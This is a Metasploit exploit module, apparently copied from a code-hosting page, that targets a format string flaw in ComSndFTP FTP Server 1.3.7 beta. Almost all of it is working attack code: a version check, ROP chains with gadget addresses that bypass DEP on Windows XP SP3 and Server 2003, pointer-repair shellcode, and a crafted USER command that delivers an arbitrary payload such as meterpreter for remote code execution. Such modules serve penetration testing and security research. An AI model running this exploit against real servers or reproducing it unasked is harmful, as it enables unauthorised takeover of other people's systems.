Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'          => 'ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability',
14
      'Description'   => %q{
15
          This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially
16
        crafted format string specifier as a username. The crafted username is sent to the server to
17
        overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer
18
        is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.
19
        The SEH exit function is preferred so that the administrators are not left with an unhandled
20
        exception message. When using the meterpreter payload, the process will never die, allowing
21
        for continuous exploitation.
22
      },
23
      'Author'        =>
24
        [
25
          'ChaoYi Huang <ChaoYi.Huang[at]connect.polyu.hk>', # vuln discovery + poc
26
          'rick2600 <rick2600[at]corelan.be>',               # msf module (target XP)
27
          'mr_me <mr_me[at]corelan.be>',                     # msf module (target 23k)
28
          'corelanc0d3r <peter.ve[at]corelan.be>'            # msf module
29
        ],
30
      'Arch'          => [ ARCH_X86 ],
31
      'License'       => MSF_LICENSE,
32
      'References'    =>
33
        [
34
          # When a DoS is NOT a DoS
35
          [ 'OSVDB', '82798'],
36
          [ 'EDB', '19024']
37
        ],
38
      'DefaultOptions' =>
39
        {
40
          'EXITFUNC' => 'seh'
41
        },
42
      'Platform'      => ['win'],
43
      'Privileged'    => false,
44
      'Payload'       =>
45
        {
46
          'Space'            => 1000,
47
          'BadChars'         => "\x00\x0a\x0d",
48
          'StackAdjustment'  => -3500,
49
          'DisableNops'      => 'True'
50
        },
51
      'Targets'       =>
52
        [
53
          [
54
            'Windows XP SP3 - English',
55
            {
56
              'Functionpointer'   => 0x71AC4050,  # winsock pointer
57
              'Functionaddress'   => 0x71AB2636,  # the repair address
58
              'Pivot'             => 0x00408D16,  # 0x004093AE-0x698 add esp, 72c ; retn
59
              'Pad' => 568
60
            }
61
          ],
62
          [
63
            'Windows Server 2003 - English',
64
            {
65
              'Functionpointer'   => 0x71C14044,  # winsock pointer
66
              'Functionaddress'   => 0x71C02661,  # the repair address
67
              'Pivot'             => 0x00408D16,  # 0x004093AE-0x698 add esp, 72c ; retn
68
              'Pad' => 568
69
            }
70
          ]
71
        ],
72
      'DisclosureDate' => '2012-06-08'))
73

74
    register_options(
75
      [
76
        Opt::RPORT(21),
77
      ])
78
  end
79

80
  def check
81
    connect
82
    banner = sock.get_once || ""
83
    disconnect
84

85
    validate  = "\x32\x32\x30\x20\xbb\xb6\xd3\xad\xb9"
86
    validate << "\xe2\xc1\xd9\x46\x54\x50\xb7\xfe\xce"
87
    validate << "\xf1\xc6\xf7\x21\x0d\x0a"
88

89
    if banner.to_s == validate
90
      return Exploit::CheckCode::Vulnerable
91
    end
92
    return Exploit::CheckCode::Safe
93
  end
94

95
  def junk(n=4)
96
    return rand_text_alpha(n).unpack("V").first
97
  end
98

99
  def exploit
100

101
    rop = ''
102
    if target.name =~ /Server 2003/
103
      # C:\WINDOWS\system32\msvcrt.dll v7.0.3790.3959
104
      rop = [
105
        0x77be3adb, # pop eax ; retn
106
        0x77ba1114, # <- *&VirtualProtect()
107
        0x77bbf244, # mov eax,[eax] ; pop ebp ; retn
108
        junk,
109
        0x77bb0c86, # xchg eax,esi ; retn
110
        0x77be3adb, # pop eax ; retn
111
        0xFFFFFBFF, # dwSize
112
        0x77BAD64D, # neg eax ; pop ebp ; retn
113
        junk,
114
        0x77BBF102, # xchg eax,ebx ; add [eax],al ; retn
115
        0x77bbfc02, # pop ecx ; retn
116
        0x77bef001, # ptr that is w+
117
        0x77bd8c04, # pop edi ; retn
118
        0x77bd8c05, # retn
119
        0x77be3adb, # pop eax ; retn
120
        0xFFFFFFC0, # flNewProtect
121
        0x77BAD64D, # neg eax ; pop ebp ; retn
122
        0x77be2265, # ptr to 'push esp ; ret'
123
        0x77BB8285, # xchg eax,edx ; retn
124
        0x77be3adb, # pop eax ; retn
125
        0x90909090, # nops
126
        0x77be6591, # pushad ; add al,0ef ; retn
127
      ].pack("V*")
128

129
    elsif target.name =~ /XP SP3/
130
      # C:\WINDOWS\system32\msvcrt.dll v7.0.2600.5512
131
      rop = [
132
        0x77C21D16, # pop eax ; retn
133
        0x77C11120, # <- *&VirtualProtect()
134
        0x77C2E493, # mov eax,[eax] ; pop ebp ; retn
135
        junk,
136
        0x77C21891, # pop esi ; retn
137
        0x77C5D010, # ptr that is w+
138
        0x77C2DD6C, # xchg eax,esi ; add [eax],al; retn
139
        0x77C21D16, # pop eax ; retn
140
        0xFFFFFBFF, # dwSize
141
        0x77C1BE18, # neg eax ; pop ebp ; retn
142
        junk,
143
        0x77C2362C, # pop ebx ; retn
144
        0x77C5D010, # ptr that is w+
145
        0x77C2E071, # xchg eax,ebx ; add [eax],al ; retn
146
        0x77C1F519, # pop ecx ; retn
147
        0x77C5D010, # ptr that is w+
148
        0x77C23B47, # pop edi ; retn
149
        0x77C23B48, # retn
150
        0x77C21D16, # pop eax ; retn
151
        0xFFFFFFC0, # flNewProtect
152
        0x77C1BE18, # neg eax ; pop ebp ; retn
153
        0x77C35459, # ptr to 'push esp ; ret'
154
        0x77C58FBC, # xchg eax,edx ; retn
155
        0x77C21D16, # pop eax ; retn
156
        0x90909090, # nops
157
        0x77C567F0, # pushad ; add al,0ef ; retn
158
      ].pack("V*")
159
    end
160

161
    stage1 = %Q{
162
      mov eax, #{target['Functionpointer']}
163
      mov ecx, #{target['Functionaddress']}
164
      mov [eax], ecx
165
    }
166

167
    offset_wp = rand_text_alphanumeric(1)
168
    pivot     = target['Pivot']
169
    offset    = target['Pad'] + rop.length + stage1.length + payload.encoded.length
170

171
    attackstring  = rand_text_alphanumeric(7)
172
    attackstring << [target['Functionpointer']].pack('V')
173
    attackstring << "%#{pivot}x"                          # special pointer to our pivot
174
    attackstring << "%p" * 208 + "#{offset_wp }%n"        # format specifiers to read and write the function pointer
175
    attackstring << rand_text_alphanumeric(target['Pad'])
176
    attackstring << rop
177
    attackstring << Metasm::Shellcode.assemble(Metasm::Ia32.new, stage1).encode_string
178
    attackstring << payload.encoded
179
    attackstring << rand_text_alphanumeric(2000 - offset)
180
    attackstring << "\r\n"
181

182
    sploit = "USER #{attackstring}\r\n"
183

184
    print_status("Triggering overflow...")
185
    connect
186
    sock.get_once(1024)
187
    sock.put(sploit)
188
    select(nil, nil, nil, 2)
189
    handler
190
    disconnect
191

192
  end
193
end
194

195